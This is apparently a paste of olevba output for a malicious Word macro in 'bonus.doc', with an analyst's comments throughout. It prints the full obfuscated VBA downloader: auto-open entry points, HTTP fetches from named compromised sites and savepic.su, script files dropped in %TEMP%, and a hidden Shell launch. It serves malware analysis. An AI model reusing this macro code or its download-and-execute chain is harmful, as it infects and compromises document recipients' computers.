dynamoo

Malicious Word macro

Jul 17th, 2015
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS-HB- bonus.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: bonus.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: bonus.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub Dqwkdojqwiodqw_Open()
          ' Empty stub: no statements in the body, and nothing in this listing calls it.
          ' The name is not one of the auto-exec names olevba reports for this stream.
  16.      
  17. End Sub
  18. Sub Ejoqiwjdioqwjdqo_Open()
          ' Empty stub: no statements in the body, and nothing in this listing calls it.
  19.      
  20. End Sub
  21. Sub Auto_Open()
          ' Auto-exec entry point (listed as AutoExec in the olevba ANALYSIS table below).
          ' Its only action is to call Djiqowjdwoiqjdqwo, which in turn starts the main routine.
  22.     Djiqowjdwoiqjdqwo
  23. End Sub
  24. Sub Djiqowjdwoiqjdqwo()
          ' Trampoline between the auto-exec subs and the main routine Xjqwidjowqjdq.
          ' UQHDIQWHD receives a filler string and is never read in this listing.
  25.     UQHDIQWHD = "1j2h eiuh1k2jeh21kjeh jk12g ehj12g"
  26.     Xjqwidjowqjdq
  27. End Sub
  28. Sub Giqjwdhqwkjq()
          ' Filler sub: assigns a junk string to a variable that is never read.
          ' Nothing in this listing calls it.
  29.     DQUHWDIWQ = "eji21h ui21he21"
  30. End Sub
  31.  
  32. Sub AutoOpen()
          ' Auto-exec entry point (AutoExec / AutoOpen in the olevba table): forwards to Auto_Open.
  33.     Auto_Open
  34. End Sub
  35. Sub Workbook_Open()
          ' Auto-exec entry point (AutoExec / Workbook_Open in the olevba table): forwards to Auto_Open.
          ' NJQWBDJQKW is a filler assignment that is never read.
  36.     NJQWBDJQKW = "j2hge h1hj1g2 hj21gje "
  37.     Auto_Open
  38. End Sub
  39.  
  40. Sub Xjqwidjowqjdq()
          ' Main routine of the macro (analyst annotations; URLs in comments are defanged).
          ' What the visible code does, in order:
          '   1. builds file paths <Temp>\<number>.ps1 / .vbs / .bat from Chr()/string fragments;
          '   2. fetches two remote text files over HTTP through Module2.Linolium;
          '   3. base64-decodes one response and cuts named sections out of it with Port();
          '   4. picks one of two branches from the shape of %USERPROFILE%;
          '   5. writes script files into the Temp directory and starts the .bat with Shell (window style 0);
          '   6. edits the open document through Module3.India.
          ' Observable artefacts implied by this code: numeric-named .bat/.vbs/.ps1 files in %TEMP%,
          ' HTTP GETs issued by the Office process to the hosts below, and a child process started
          ' from the Office process. Many assignments are filler and are never read.
  41.  
  42.    
  43.     Dim fallout As Integer, silkroad As Integer, inclife As Integer, inredible As Integer
  44.     Dim retVal As Variant, gana As Integer, turkey As Integer, malay As Integer, SPAIN As String, BOLIVIA As String
          ' Chr(92) = "\" (path separator).
  45.     BOLIVIA = Chr(90 + 2)
  46.    
  47.    
          ' ANGOLA/QHDQUWH/FL2: base file name, a numeric string in the range 10000..25424
          ' (see Ubqhwdhwqbd). No Randomize call is visible in this listing, so the value may
          ' repeat between runs - NOTE(review): confirm in a sandbox before using it as an indicator.
  48.     ANGOLA = Ubqhwdhwqbd(15425) + ""
          ' SPAIN = "Temp"; PH2 = Environ("Temp") & "\" (Module2.Goabc wraps Environ).
  49.     SPAIN = Chr(84) & "em" + "p"
  50.     QHDQUWH = ANGOLA
  51.     FL2 = QHDQUWH
  52.     PH2 = Module2.Goabc(SPAIN) + BOLIVIA
  53.    
  54.     silkroad = 9
  55.     jwnqdw = -1
  56.    
          ' BOSNIA ends up as 1 + 1 + 113 + Sgn(-1) = 114; the first assignment is overwritten.
  57.     BOSNIA = 12312312
  58.     BOSNIA = 1 + 1 + 113 + Sgn(jwnqdw)
  59.     BALAGAN = BOSNIA
  60.    
  61.  
          ' TROYA, JWIDJIAAA, IUQJWD are filler. HUYFEA is overwritten with "bat".
  62.     TROYA = "banbv2dbgh21f gd2h1f21ghfd gh12fgh1t"
  63.     JWIDJIAAA = ""
  64.     HUYFEA = "gdhjqwg hqjwgdhjqwg hjqwgdhjqwg"
  65.     QIWJDABB = "b"
  66.     HUYFEA = QIWJDABB + "a" + "t"
  67.     IUQJWD = "bjgqhdhjg21jhgdhj1g jh1eg hj21ge j2h"
          ' PSFL = FL2 & ".ps1"  (Chr(115) = "s", Chr(49) = "1").
  68.     PSFL = FL2 + "" & "" + "." + "p" + "" + Chr(115) + Chr(49)
  69.    
          ' gana = Sgn(1 - 300 * Sin(20)); the argument is negative, so gana = -1.
  70.     gana = NUqwdqwbdsad(1 - 300 * Sin(20))
          ' SSS = Chr(114 + 2 - 1) = Chr(115) = "s".
  71.     SSS = Chr(BALAGAN + 2 + gana)
          ' VBFL = FL2 & ".vbs"  (Chr(46) = ".").
  72.     VBFL = FL2 + Chr(50 - 4) + "v" + "" + "" & "b" & "" & SSS & ""
          ' BAFL = FL2 & ".bat"  (Sgn(Fix(-22.043)) = -1, so the Chr argument is 46 = ".").
  73.     BAFL = FL2 + Chr(NUqwdqwbdsad(Fix(-22.043)) + 31 - 10 + 25 + gana + 2) + HUYFEA
  74.    
          ' INTG = "object"; AFTG = "module" (Chr(110 + 1) = "o", Chr(109) = "m").
          ' They are used as tag names in the Module3.India calls at the end of this sub.
  75.     INTG = "" & "o" & "bject"
  76.     KIWD = Chr(110 + NUqwdqwbdsad(Len(BAFL))) + "dule"
  77.     AFTG = Chr(109) & KIWD
  78.    
          ' SXE = ".exe"; GNG = ".jpg"  (2 ^ 2 + 42 = 46 = ".").
  79.     SXEE = Chr(46)
  80.     SXAA = Chr(101)
  81.     SXE = SXEE & SXAA & "" & "xe"
  82.     GNG = Chr(2 ^ 2 + 42) + "jpg"
  83.    
  84.    
  85.    
          ' HUQD = "/"; ATTH = "http://"; BQHJDQ = "savepic.su/" (defanged: savepic[.]su/).
  86.     HUQD = Chr(30 + 16 + 1)
  87.     ATTH = "ht" & "t" & "" & "p" & ":" & "/" & Chr(47)
  88.     BQHJDQ = "sav" + "epic" & Chr(46) & "su" + HUQD
  89.      
          ' Full drop paths: <Temp>\<number>.ps1, <Temp>\<number>.vbs, <Temp>\<number>.bat.
          ' The first BAPTH value is filler and is replaced by ABPTH two lines later.
  90.     PSPTH = PH2 + PSFL
  91.     VBPTH = PH2 + VBFL
  92.     BAPTH = "1hj2gehj12g1h f2gh112 feg1h2f e"
  93.     ABPTH = PH2 + BAFL
  94.     BAPTH = ABPTH
  95.     JHQKWDQAASS = BQHJDQ
  96.    
  97.     Dim BALAGANHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer, CONT As String
  98.    
          ' DRT..EFT are the file numbers used by the Open/Print #/Close statements below.
  99.     DRT = 315
  100.     BFT = 316
  101.     CFT = 317
  102.     DFT = 318
  103.     EFT = 319
  104.     Dim NUWDHUQHUQWDH As String
          ' "USERPROFILE" - environment variable name, read further down to choose a branch.
  105.     NUWDHUQHUQWDH = "USE" & "RPROFILE"
  106.     Dim PBIn As String, asdwq As String, MIWDWQ As String
  107.    
  108.    
  109.    
          ' Remote resources (defanged):
          '   CDDD = "78672738612836.txt", LNSS = "papa.txt"
          '   STT1 = www.buck[.]tv/cms/wp-content/uploads/
          '   STT2 = www.bereciartua[.]com/wp-content/themes/bereciartua/
  110.     TSTS = "." + "t" + "xt"
  111.     CDDD = "78672738612836" + TSTS
  112.     LNSS = "p" & "a" & "p" & "a" & "" + TSTS
  113.     STT1 = "www.buck.tv/cms/w" & "p-co" & "ntent/up" & "loads/"
  114.     STT2 = "www.bereciartua.com/w" & "p-cont" & "ent/th" & "emes/bere" & "ciartua/"
  115.  
  116.  
          ' First HTTP GET: "http://" & STT1 & CDDD. Module2.Linolium returns the response text.
  117.     PBIn = ATTH + STT1 + CDDD
  118.     CONT = Module2.Linolium(PBIn)
  119.      
          ' asdwq = last character of that response (Rasdas = Right(a, 1)).
  120.     asdwq = Rasdas(CONT)
  121.    
          ' If the last character is not "=", request the same file name from the second host
          ' and keep the whole response in asdwq; HQUWDAAA = "1" records that the second host was used.
  122.     HQUWDAAA = "0"
  123.     If (asdwq <> "=") Then
  124.         PBIn = ATTH + STT2 + CDDD
  125.         CONT = Module2.Linolium(PBIn)
  126.         asdwq = CONT
  127.         HQUWDAAA = "1"
  128.     End If
  129.    
          ' Base64-decode whatever asdwq holds at this point (see Quqhwdbyas).
  130.     CONT = Quqhwdbyas(asdwq)
  131.      
  132.     Dim ahuywdgqy As String
  133.      
          ' Port() cuts the text between <name> and </name> out of the decoded blob. The section
          ' names are text10, text20, text21, text30, text31, stext1, stext2, stext3; the section
          ' contents come from the remote file and are not part of this listing.
  134.     TVT10 = Port(CONT, "t" & "ext10")
  135.     TVT20 = Port(CONT, "t" & "ext20")
  136.     TVT21 = Port(CONT, "t" & "ext21")
  137.     TVT30 = Port(CONT, "t" & "ext30")
  138.     TVT31 = Port(CONT, "t" & "ext31")
  139.     XPT1 = Port(CONT, "stext1")
  140.     XPT2 = Port(CONT, "stext2")
  141.     XPT3 = Port(CONT, "stext3")
  142.    
  143.    
          ' Branch selection: does %USERPROFILE% contain "sers\" (e.g. a "...\Users\..." path)?
  144.     WVR = Module2.Goabc(NUWDHUQHUQWDH)
  145.     hufehu1 = InStr(WVR, "sers\")
  146.    
  147.     Dim hudhw As Integer
  148.     Dim ghdAdd(1 To 3)
  149.     ghdAdd(1) = "1"
  150.     ghdAdd(2) = "0"
  151.     ghdAdd(3) = "0"
  152.    
          ' Match    -> ("2","0","0") -> Join gives "2 0 0" -> Val gives 200.
          ' No match -> ("1","3","0") -> Join gives "1 3 0" -> Val gives 130.
  153.     If (hufehu1 <> 0) Then
  154.         ghdAdd(1) = "2"
  155.     Else
  156.         ghdAdd(2) = "3"
  157.     End If
  158.  
  159.  
  160.     JHWQUD = Join(ghdAdd)
  161.     hudhw = Val(JHWQUD)
  162.    
  163.     Module2.WaitFor (1)
  164.    
          ' Second HTTP GET: papa.txt from the same host that served the first file.
          ' The response text (SEXX) is later embedded as a string in the dropped scripts.
  165.     MIWDWQ = ATTH + STT1 + LNSS
  166.     If (HQUWDAAA = "1") Then
  167.         MIWDWQ = ATTH + STT2 + LNSS
  168.     End If
  169.    
  170.     SEXX = Module2.Linolium(MIWDWQ)
  171.    
          ' PSTB is never read. Further values (defanged):
          '   STAR1 = hxxp://savepic[.]su/5751812.jpg
          '   STAR2 = hxxp://savepic[.]su/5757956.jpg  (STAR2 itself is unused; MSTAR2 is used below)
          '   FF    = "8.exe"
  172.     PSTB = PBIn + "123123123"
  173.     MSTAR1 = JHQKWDQAASS + "5751812" + GNG
  174.     MSTAR2 = JHQKWDQAASS + "5757956" + GNG
  175.     STAR1 = ATTH + MSTAR1
  176.     STAR2 = ATTH + MSTAR2
  177.     FFQ = "8"
  178.     FF = FFQ + SXE
  179.    
          ' Branch 130 (%USERPROFILE% without "sers\"): writes the .bat and the .vbs.
          ' The .bat gets section stext1, three "set" lines (Temp dir, base name, "8") and stext2.
  180.      If (hudhw = 130) Then
  181.      Open BAPTH For Output As #DRT
  182.      Print #DRT, XPT1
  183.      Print #DRT, ":jadkjasghdjasg" & vbCrLf & "set trfd=" + Chr(34) + PH2 + Chr(34)
  184.      Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
  185.      Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
  186.      Print #DRT, XPT2
  187.      Close #DRT
  188.      
  189.      Module2.WaitFor (1)
  190.      
          ' The .vbs gets four assignments followed by section stext3: strRT = papa.txt response,
          ' statRT = STAR1, jfeuygq = "8.exe", strTecation = <Temp>\ + jfeuygq.
          ' NOTE(review): <Temp>\8.exe is presumably where the fetched payload is saved - the code
          ' that uses these variables is in stext3 and is not visible here.
  191.      Open VBPTH For Output As #BFT
  192.      Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
  193.      Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
  194.      Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
  195.      Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
  196.      Print #BFT, XPT3
  197.      Close #BFT
  198.      
          ' NOTE(review): BDDT is not defined in any module shown in this listing (WaitFor lives in Module2).
          ' Module3.HowEver then runs the .bat through Shell with window style 0.
  199.      BDDT.WaitFor (1)
  200.      NTH1 = Module3.HowEver(retVal, BAPTH)
  201.      
  202.      End If
  203.      
  204.      
          ' HUDQG = "';" closes a single-quoted string in the generated .ps1 lines below.
  205.      HUDQG = "';"
  206.      
  207.      
  208.      
          ' Branch 200 (%USERPROFILE% contains "sers\"): writes .ps1, .vbs and .bat.
  209.       If (hudhw = 200) Then
  210.        
          ' The .ps1 gets variable assignments ($stat = "http://" + MSTAR2, $ggtt = papa.txt response,
          ' $pths = Temp dir, $wehs = base name, $nnm = "8") followed by section text10.
  211.      ZPQSKD = FL2
  212.      Open PSPTH For Output As #CFT
  213.      Print #CFT, "$nqjkwdnq = 'qiwdqwhd';"
  214.      Print #CFT, "$ndqbwdwqs = 'jqwdnjkqwhd';"
  215.      Print #CFT, "$stat = 'ht'+'tp://'+''+'" + MSTAR2 + "';"
  216.      Print #CFT, "$ggtt = '" + SEXX + "';"
  217.      Print #CFT, "$pths = '" + PH2 + HUDQG
  218.      
  219.      Print #CFT, "$wehs = '" + ZPQSKD + HUDQG
  220.      Print #CFT, "$nnm = '" + FFQ + "';"
  221.      Print #CFT, TVT10
  222.      Close #CFT
  223.      
          ' The .vbs gets section text30, a currentFile assignment built from Temp dir and base name,
          ' and section text31.
  224.      Open VBPTH For Output As #DFT
  225.      Print #DFT, TVT30
  226.      Print #DFT, "c" + "urrentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&huih"
  227.      Print #DFT, TVT31
  228.      Close #DFT
  229.    
          ' The .bat starts with "@echo off" (Chr(64) = "@"), then section text20, three "set" lines
          ' separated by label lines, and section text21.
  230.      Open BAPTH For Output As #EFT
  231.      Print #EFT, Chr(30 + 30 + 4) + "echo off" & vbCrLf & ":jqduqihdjsakd"
  232.      Print #EFT, TVT20
  233.      Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
  234.      Print #EFT, ":nqudiiqhdjkashd"
  235.      Print #EFT, "set Mts4=" + Chr(34) + PH2 + Chr(34)
  236.      Print #EFT, ":nqjdkbjkbdhjqwb"
  237.      Print #EFT, "set Rts4=" + "%Mts4%%Ads3%"
  238.      Print #EFT, TVT21
  239.      Close #EFT
  240.      Module2.WaitFor (1)
  241.      
          ' Runs the .bat through Shell with window style 0 (see Module3.HowEver).
  242.      NTH2 = Module3.HowEver(retVal, BAPTH)
  243.      
  244.      End If
  245.      
          ' JUW = "/", AKK = "<", ZKK = ">". The calls below pass "<object>", "</object>",
          ' "<module>" and "</module>" to Module3.India, which edits the open document:
          ' mode 1 deletes a range, mode 2 sets its font colour to black, mode 3 runs a replace-all.
  246.     JUW = Chr(47)
  247.     AKK = Chr(60)
  248.     ZKK = ">"
  249.     NTH3 = Module3.India(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
  250.     NTH4 = Module3.India(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
  251.     NTH5 = Module3.India(AKK + INTG + ZKK, "", 3)
  252.     NTH6 = Module3.India(AKK + JUW + INTG + ZKK, "", 3)
  253.     NTH7 = Module3.India(AKK + AFTG + ZKK, "", 3)
  254.     NTH8 = Module3.India(AKK + JUW + AFTG + ZKK, "", 3)
  255.    
  256. End Sub
  257.  
  258.  
  259. Public Function NUqwdqwbdsad(a As Integer)
          ' Thin wrapper around Sgn: returns -1, 0 or 1 for the sign of a.
          ' The main routine uses it to hide small constants inside Chr() arithmetic.
  260. NUqwdqwbdsad = Sgn(a)
  261. End Function
  262.  
  263. Public Function Hhqudhqwgyuqwaaa(a As Integer)
          ' Second wrapper around Sgn, identical in behaviour to NUqwdqwbdsad; called from Quqhwdbyas.
  264. Hhqudhqwgyuqwaaa = Sgn(a)
  265. End Function
  266.  
  267. Public Function Ubqhwdhwqbd(a As Integer)
          ' Returns Int(a * Rnd + 10000) as a string, i.e. a number from 10000 up to 10000 + a - 1.
          ' The main routine calls it with 15425 to produce the base name of the dropped files.
  268. Ubqhwdhwqbd = CStr(Int((a * Rnd) + 10000))
  269. End Function
  270.  
  271.  
  272. Public Function Quqhwdbyas(ByVal strData As String) As String
          ' Base64 decoder built on an MSXML DOM node.
          ' strData is assigned as the node text with DataType "bin.base64", and the node's
          ' nodeTypedValue is returned through the String return value.
  273.     Dim objXML As Object
  274.     Dim objNode As Object
  275.     Dim asduiwhqdqiw As Integer, nudqwd As Integer, sshquwdq As Integer
          ' Log10(100) = 2, Sgn(1 - 2) = -1, Chr(78 - 1) = "M": the ProgID is "MSXML2.DOMDocument".
  276.     nudqwd = Log10(100)
  277.     asduiwhqdqiw = Hhqudhqwgyuqwaaa(1 - nudqwd)
  278.     QHDHUQW = "" & Chr(78 + asduiwhqdqiw) + "SXML2.DOMDocument"
  279.     Set objXML = CreateObject(QHDHUQW)
  280.     Set objNode = objXML.createElement("b6" + "4")
          ' objNodeS/E/Q/Z are filler assignments that are never read.
  281.     objNodeS = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
  282.     objNodeE = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
  283.     objNodeQ = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
  284.     objNodeZ = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
          ' "bin.b" + Chr(97) + "se" + "6" & "4" = "bin.base64".
  285.     objNode.DataType = "bin.b" + Chr(97) + "se" + "6" & "4"
  286.     objNode.Text = strData
  287.     WUDHA = objNode.nodeTypedValue
  288.     Quqhwdbyas = WUDHA
  289.     Set objNode = Nothing
  290.     Set objXML = Nothing
  291. End Function
  292.  
  293. Public Function Port(a, b As String)
          ' Returns the text of a that lies between "<" & b & ">" and "</" & b & ">".
          ' The start offset is a fixed + 8, which equals the opening-tag length for the
          ' 6-character names the main routine passes (text10, stext1, ...).
  294. Dim krd, tent As Integer
          ' UQWD = "<" (Chr(60)), NDUW = ">" (Chr(62)).
  295. UQWD = "" & Chr(58 + 2)
  296. NDUW = "" & Chr(70 - 8)
          ' krd = first position after the opening tag; tent = length up to the closing tag.
  297. krd = InStr(1, a, UQWD + b + NDUW) + 8
  298. tent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
  299. KLMN = Mid$(a, krd, tent)
  300. HUQHWDA = KLMN
  301. Port = HUQHWDA
  302. End Function
  303.  
  304. Private Static Function Rasdas(a As String)
          ' Returns the last character of a. The main routine compares the result with "=".
  305. Rasdas = Right(a, 1)
  306. End Function
  307.  
  308.  
  309. Private Static Function Log10(x)
          ' Base-10 logarithm of x via Log(x) / Log(10). Only called with 100 in this listing,
          ' to produce the constant 2. SWOPJDQIOW is a filler assignment.
  310. SWOPJDQIOW = "jqhw gdhjg12hjgd21g21d"
  311. Log10 = Log(x) / Log(10#)
  312. End Function
  313.  
  314.  
  315.  
  316.  
  317.  
  318.  
  319.  
  320.  
  321.  
  322.  
  323.  
  324.  
  325.  
  326.  
  327. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  328. ANALYSIS:
  329. +------------+----------------+-----------------------------------------+
  330. | Type       | Keyword        | Description                             |
  331. +------------+----------------+-----------------------------------------+
  332. | AutoExec   | AutoOpen       | Runs when the Word document is opened   |
  333. | AutoExec   | Auto_Open      | Runs when the Excel Workbook is opened  |
  334. | AutoExec   | Workbook_Open  | Runs when the Excel Workbook is opened  |
  335. | Suspicious | Open           | May open a file                         |
  336. | Suspicious | Chr            | May attempt to obfuscate specific       |
  337. |            |                | strings                                 |
  338. | Suspicious | CreateObject   | May create an OLE object                |
  339. | Suspicious | Output         | May write to a file (if combined with   |
  340. |            |                | Open)                                   |
  341. | Suspicious | Print #        | May write to a file (if combined with   |
  342. |            |                | Open)                                   |
  343. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  344. |            |                | be used to obfuscate strings (option    |
  345. |            |                | --decode to see all)                    |
  346. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  347. |            |                | may be used to obfuscate strings        |
  348. |            |                | (option --decode to see all)            |
  349. +------------+----------------+-----------------------------------------+
  350. -------------------------------------------------------------------------------
  351. VBA MACRO Module1.bas
  352. in file: bonus.doc - OLE stream: u'Macros/VBA/Module1'
  353. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  354. Public Function Xjdkhjfwefw(a As Object)
          ' Returns a.responseText. Module2.Linolium passes in its HTTP request object, so this is
          ' where the downloaded body is read; splitting it into its own module keeps this stream
          ' free of the keywords olevba flags (see "No suspicious keyword or IOC found" below).
  355. Xjdkhjfwefw = (a.responseText)
  356. End Function
  357.  
  358.  
  359. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  360. ANALYSIS:
  361. No suspicious keyword or IOC found.
  362. -------------------------------------------------------------------------------
  363. VBA MACRO Module2.bas
  364. in file: bonus.doc - OLE stream: u'Macros/VBA/Module2'
  365. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  366.  
  367. Public Function Goabc(sps As String)
          ' Wrapper around Environ: returns the value of the environment variable named sps.
          ' Called with "Temp" and "USERPROFILE" by the main routine. The three string
          ' assignments are filler and are never read.
  368. QBYDGQWDWQ = "1hj2ehjg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
  369. QBYADGQWDWQ = "1sdhj2ehjg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
  370. QBYXDGQWDWQ = "1hj2ehjdsg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
  371. Goabc = Environ(sps)
  372. End Function
  373. Public Function Linolium(nbqjbdjqw As String)
          ' HTTP downloader: issues a GET for the URL in nbqjbdjqw and returns the response text
          ' (read through Module1.Xjdkhjfwefw).
  374. Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, Kjqiwdhqwuhdjqkwhdjkqwbd As Object, AHUDWQI As String
  375. Dim ashdUHhda As String, hausd As Integer
  376. ashdUHhda = nbqjbdjqw
          ' hausd = Sgn(0 - Abs(Cos(140))) = -1, so Chr(85 - 1) = "T" and the ProgID is
          ' "MSXML2.ServerXMLHTTP".
  377. hausd = Sgn(0 - Abs(Cos(140)))
  378. BQDHJQWDGWQJGS = "MSXML2.ServerXMLH" & Chr(85 + hausd) & Chr(84) & Chr(80)
  379. 'MsgBox (BQDHJQWDGWQJGS)
  380. Set Kjqiwdhqwuhdjqkwhdjkqwbd = CreateObject(BQDHJQWDGWQJGS)
          ' Method string is "GET"; no async argument is passed to Open.
  381. Kjqiwdhqwuhdjqkwhdjkqwbd.Open "GE" & "" & "T", ashdUHhda
          ' AHUDWQI is declared but never assigned, so the request body is an empty string.
  382. Kjqiwdhqwuhdjqkwhdjkqwbd.Send (AHUDWQI)
  383. Linolium = Module1.Xjdkhjfwefw(Kjqiwdhqwuhdjqkwhdjkqwbd)
  384. End Function
  385. Sub WaitFor(NumOfSeconds As Long)
          ' Delay loop: spins on Timer until NumOfSeconds have passed, calling DoEvents on each
          ' iteration. The main routine calls it with 1 between file writes and before Shell.
  386. Dim SngSec As Long
  387. SngSec = Timer + NumOfSeconds
  388. Do While Timer < SngSec
  389. DoEvents
  390. Loop
  391. End Sub
  392.  
  393.  
  394. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  395. ANALYSIS:
  396. +------------+--------------+-----------------------------------------+
  397. | Type       | Keyword      | Description                             |
  398. +------------+--------------+-----------------------------------------+
  399. | Suspicious | Open         | May open a file                         |
  400. | Suspicious | Chr          | May attempt to obfuscate specific       |
  401. |            |              | strings                                 |
  402. | Suspicious | CreateObject | May create an OLE object                |
  403. | Suspicious | Environ      | May read system environment variables   |
  404. +------------+--------------+-----------------------------------------+
  405. -------------------------------------------------------------------------------
  406. VBA MACRO Module3.bas
  407. in file: bonus.doc - OLE stream: u'Macros/VBA/Module3'
  408. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  409.  
  410.  
  411. Public Function India(dnuwhd As String, b As String, c As Integer)
          ' Edits the text of the open document (ActiveDocument) with Word's Find object.
          '   dnuwhd - first search string (the main routine passes an opening or closing tag)
          '   b      - second search string (a closing tag, or "" for mode 3)
          '   c      - mode: 1 = delete the range between the two matches,
          '                  2 = set that range's font colour to black,
          '                  3 = replace-all with a single space.
          ' NOTE(review): presumably this changes what the reader sees once the macro has run;
          ' the document body is not part of this listing, so confirm against the sample.
          ' The HQUDGYGASDHJ / RHQHDQWUHDQKW assignments are filler.
  412. Dim selectedText As String
  413. Dim ssjidoqwhduqhwidqwudihq As Range, lesleslesqjhdjqkwhdwq As Range
  414. Set ssjidoqwhduqhwidqwudihq = ActiveDocument.Range
  415. HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  416. HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  417. With ssjidoqwhduqhwidqwudihq.Find
  418. 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  419. 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
          ' First search: find dnuwhd, then collapse the range to the end of the match.
  420. .Text = dnuwhd
  421. .MatchWholeWord = True
  422. ssjidoqwhduqhwidqwudihq.Find.Execute
  423. ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseEnd
  424. Dim wdwq As String
  425. Set lesleslesqjhdjqkwhdwq = ActiveDocument.Range
  426. Dim wdsadwq As String
          ' The second range starts where the first match ended.
  427. lesleslesqjhdjqkwhdwq.Start = ssjidoqwhduqhwidqwudihq.End
          ' Second search: find b, collapse to its start; the second range ends there.
  428. .Text = b
  429. .MatchWholeWord = True
  430. .Execute
  431. RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  432. RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  433. ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseStart
  434. lesleslesqjhdjqkwhdwq.End = ssjidoqwhduqhwidqwudihq.Start
  435.  
  436. If (c = 1) Then
  437.     selectedText = lesleslesqjhdjqkwhdwq.Delete
  438. End If
  439. If (c = 2) Then
  440.     lesleslesqjhdjqkwhdwq.Font.Color = wdColorBlack
  441. End If
  442.  
          ' hduwaa = 1 - 16 = -15, Sgn = -1, so QHUDW = Chr(32) = " " (a single space).
  443. Dim hduwaa As Integer
  444. hduwaa = 1 - 2 ^ 4
  445.  
  446. QHUDW = Chr(33 + Sgn(hduwaa))
  447.  
  448. If (c = 3) Then
  449.     With ssjidoqwhduqhwidqwudihq.Find
          ' NOTE(review): a is neither a parameter nor a declared local of this function
          ' (the parameters are dnuwhd, b, c); confirm what .Text actually receives here.
  450.     .Text = a
  451.     .Replacement.Text = QHUDW
  452.     'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  453.    'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  454.    'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  455.    'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  456.    .Wrap = wdFindContinue
  457.     .Execute Replace:=wdReplaceAll
  458.     End With
  459. End If
  460.  
  461. End With
  462. End Function
  463.  
  464. Public Function HowEver(a As Variant, b)
          ' Process launcher: runs b with Shell using window style 0 (hidden window) and returns
          ' Shell's result. The main routine passes the path of the .bat it wrote to the Temp
          ' directory, so this is the point where execution leaves the Office process.
          ' VGQDVHQWD is a filler assignment.
  465. VGQDVHQWD = "h2eh1 fg12e"
  466. a = Shell(b, 0)
  467. HowEver = a
  468. End Function
  469.  
  470.  
  471.  
  472.  
  473.  
  474.  
  475.  
  476.  
  477.  
  478.  
  479.  
  480.  
  481.  
  482.  
  483.  
  484. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  485. ANALYSIS:
  486. +------------+---------+-----------------------------------------+
  487. | Type       | Keyword | Description                             |
  488. +------------+---------+-----------------------------------------+
  489. | Suspicious | Chr     | May attempt to obfuscate specific       |
  490. |            |         | strings                                 |
  491. | Suspicious | Shell   | May run an executable file or a system  |
  492. |            |         | command                                 |
  493. +------------+---------+-----------------------------------------+